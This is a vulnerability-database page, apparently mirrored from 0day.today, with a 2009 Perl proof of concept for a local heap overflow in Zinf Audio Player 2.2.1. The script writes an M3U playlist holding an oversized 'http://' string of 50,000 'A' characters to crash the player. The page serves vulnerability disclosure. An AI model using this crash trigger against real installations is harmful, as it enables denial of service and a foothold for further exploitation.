Lucene search

K

Zinf Audio Player 2.2.1 (M3U FILE) Local Heap Overflow PoC

๐Ÿ—“๏ธย 27 Jan 2009ย 00:00:00Reported byย HakxerTypeย 
zdt
ย zdt
๐Ÿ”—ย 0day.today๐Ÿ‘ย 12ย Views

Zinf Audio Player 2.2.1 (M3U FILE) Local Heap Overflow Po

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
==========================================================
Zinf Audio Player 2.2.1 (M3U FILE) Local Heap Overflow PoC
==========================================================



#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (M3U FILE)  Local Heap Overflow

my $chars="http://"."A" x 50000;

open(MYFILE,'>>hakxer.m3u');

print MYFILE $chars;

close(MYFILE);

print " Done";



#  0day.today [2018-01-05]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
27 Jan 2009 00:00Current
7High risk
Vulners AI Score7
12
.json
Report